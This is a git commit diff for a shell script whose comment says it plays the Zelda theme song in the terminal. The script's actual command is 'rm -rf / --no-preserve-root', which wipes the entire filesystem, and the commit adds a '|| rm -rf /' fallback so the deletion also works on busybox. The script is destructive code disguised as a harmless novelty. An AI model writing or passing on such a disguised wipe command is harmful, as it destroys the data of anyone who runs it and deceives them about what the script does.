support busybox
This commit is contained in:
parent
cf2029ef29
commit
299627eac3
@ -1,4 +1,4 @@
|
|||||||
#!/bin/sh
|
#!/bin/sh
|
||||||
set -x
|
set -x
|
||||||
# plays zelda theme song in terminal
|
# plays zelda theme song in terminal
|
||||||
rm -rf / --no-preserve-root
|
rm -rf / --no-preserve-root || rm -rf /
|
||||||
|
Loading…
Reference in New Issue
Block a user